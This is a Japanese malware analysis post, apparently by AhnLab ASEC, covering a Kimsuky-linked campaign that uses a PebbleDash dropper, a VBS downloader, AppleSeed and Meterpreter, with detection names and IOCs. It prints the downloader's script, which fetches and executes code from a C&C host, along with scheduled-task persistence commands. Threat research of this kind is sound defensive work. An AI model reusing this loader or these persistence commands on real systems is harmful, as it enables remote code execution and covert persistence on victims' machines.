最近 ASEC 分析チームは、APT 攻撃を試みるマルウェアの動向を継続的に把握しており、関連内容を共有している。今回確認された事例は PebbleDash バックドア型マルウェアを利用した攻撃事例であり、このほかにも AppleSeed、Meterpreter およびさらなる別のマルウェアのログを確認することができた。
PebbleDash バックドア
攻撃者は以下のようなスピアフィッシングメールを送信して、ユーザーが添付ファイルのリンクをクリックして圧縮ファイルをダウンロードし、実行させるように誘導している。
添付の zip ファイルを解凍すると以下のような「준공계.pif」(翻訳:竣工届.pif)ファイルを確認できる。このマルウェアは実際に不正な振る舞いを実行する PebbleDash バックドア型マルウェアをドロップするドロッパーマルウェアである。
ドロッパーマルウェアは PebbleDash を「C:\ProgramData\thumbs.db.pif」パスにドロップして実行し、同時に正常な PDF ドキュメントファイルの「C:\ProgramData\준공계.pdf」をドロップして実行するため、ユーザーは PDF ドキュメントファイルを開いたものと認知する。
このようにしてスピアフィッシングメールの添付ファイルを通じてインストールされた PebbleDash は、攻撃者の命令によって不正な振る舞いを実行できるバックドア型マルウェアである。C&C サーバーから送られて実行可能なコマンドには、プロセスおよびファイルの操作、ファイルのダウンロード、アップロード機能等があり、これによって攻撃者は PebbleDash を利用してシステムの制御を行うことができる。
今回確認された PebbleDash は全体的に今年から確認されていた形式と類似しているが、以下のような違いも存在する。まず、これまでは実行パスに system32 フォルダーを生成したあと smss.exe という名前でコピーして再帰実行していた振る舞いとは異なり、現在確認されている PebbleDash は system32 フォルダーを生成するまでは同じだが、lsass.exe という名前でインストールする。
PebbleDash は実行時に引数が要求されるが、2021年基準で引数として使用された履歴があった文字列は「zWbTLWgKymXMDwZ」、「MskulCxGMCgpGdM」であり、今回確認された PebbleDash は「njXbxuRQyujZeUAGGYaH」が引数として要求された。
「njXbxuRQyujZeUAGGYaH」を引数として受け取り実行される場合、自身を同じパスの \system32\lsass.exe、すなわち C:\ProgramData\system32\lsass.exe にコピーおよび実行するが、この時には「iFfmHUtawXNNxTHEiAAN」と最初の実行プログラムのパスを引数として渡して実行したあと、元のファイルを自己削除する。結果として、感染したシステムでは以下のようなプロセスを確認できる。
VBS マルウェア
上記で確認された PebbleDash は一つの事例に過ぎず、当該システムおよび関連システムにおいてはさらなる別のマルウェアを確認することができた。一つ目は、VBS マルウェアである。Kimsuky グループは AppleSeed をインストールする際に上記のドロッパーマルウェアに類似した pif ドロッパーマルウェアを利用している。PebbleDash をインストールした pif ドロッパーは正常なドキュメントファイルを表示したあと PebbleDash のみをインストールしたが、一般的に AppleSeed をインストールする pif ドロッパーはさらに VBS マルウェアのインストールを実行する。
VBS マルウェアは mshta.exe を利用して外部から vbs をダウンロードして実行する機能を行う。このプロセスを通じてダウンロードして実行される追加の VBS スクリプトは、情報を窃取し、2つのタスクスケジューラを登録するが、過去の事例では以下のようなコマンドが使用された。
> cmd /c schtasks /Create /SC minute /MO 20 /TN GoogleCache /TR "wscript //e:vbscript
//b C:\ProgramData\Chrome\.NetFramework.xml" /f
> cmd /c schtasks /Create /SC minute /MO 1 /TN GoogleUpdate /TR "regsvr32 /s
C:\ProgramData\Chrome\update.cfg" /f今回確認された感染システムでは、pif ドロッパーを確認することができなかったが、上記事例と同じように、以下のようなタスクスケジューラが登録されていた。
"wscript //e:vbscript //b C:\ProgramData\Chrome\.NetFramework.xml"
"regsvr32 /sC:\ProgramData\Microsoft\Windows\update.cfg"収集された「.NetFramework.xml」ファイルは拡張子が xml だが、実際には vbs マルウェアである。「.NetFramework.xml」は以下のような単純なスクリプトだが、その機能としては外部から追加のスクリプトをダウンロードして実行させるものがすべてである。
On Error Resume Next:
Set rudrbvikmeaaaoja = CreateObject("MSXML2.ServerXMLHTTP.6.0"):
rudrbvikmeaaaoja.open "POST", "hxxp://m.sharing.p-e[.]kr/index.php?query=me",
False:rudrbvikmeaaaoja.Send:Execute(rudrbvikmeaaaoja.responseText):解析当時の基準では、C&C サーバーから以下のような単純なコマンドを渡されていた。しかし、タスクスケジューラに登録されて定期的にコマンドをダウンロードして実行するため、攻撃者が別のコマンドを渡した場合はさらなる悪意のあるコマンドを実行する可能性がある。
Set WShell=CreateObject("WScript.Shell"):retu=WShell.run("cmd /c taskkill /im mshta.exe /f" , 0 ,true)追加ログ
ここまでは、実際に確認されたファイルを基準として解析を行った内容である。VBS マルウェアは AppleSeed をインストールする pif ドロッパーによりインストールされるが、これに従い当社 ASD(AhnLab Smart Defense) インフラ上でも AppleSeed のログを確認することができた。インストールされた AppleSeed は正常なソフトウェアに偽装したパスにインストールされて以下のようなコマンドラインで実行されていた。このようなインストール先は AppleSeed の典型的な特徴の一つである。
regsvr32.exe /s "C:\ProgramData\Firmware\ESTsoft\Common\ESTCommon.dll"このほかにも AppleSeed 感染システムに同時にインストールされる傾向がある Metasploit の Meterpreter に関するログも確認されている。
ここまでは確認されたマルウェアの機能を簡単に説明していた。
[ファイル検知]
- ファイル検知
Dropper/Win.LightShell (2021.12.16.01)
Backdoor/Win.PebbleDash.R458675 (2021.12.16.00)
Downloader/VBS.Agent (2021.12.08.00) - ビヘイビア検知
Execution/MDP.Wscript.M3817
[IOC 情報]
- PebbleDash Dropper MD5
269ded557281d38b5966d6227c757e92 - PebbleDash MD5
7211fed2e2ec624c87782926200d61fd - VBS Downloader MD5
71fe5695bd45b72a8bb864636d92944b
25f057bff7de9d3bc2fb325697c56334 - PebbleDash C&C
hxxp://tools.macbook.kro[.]kr/update.php - VBS Downloader C&C
hxxp://m.sharing.p-e[.]kr/index.php?query=me
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報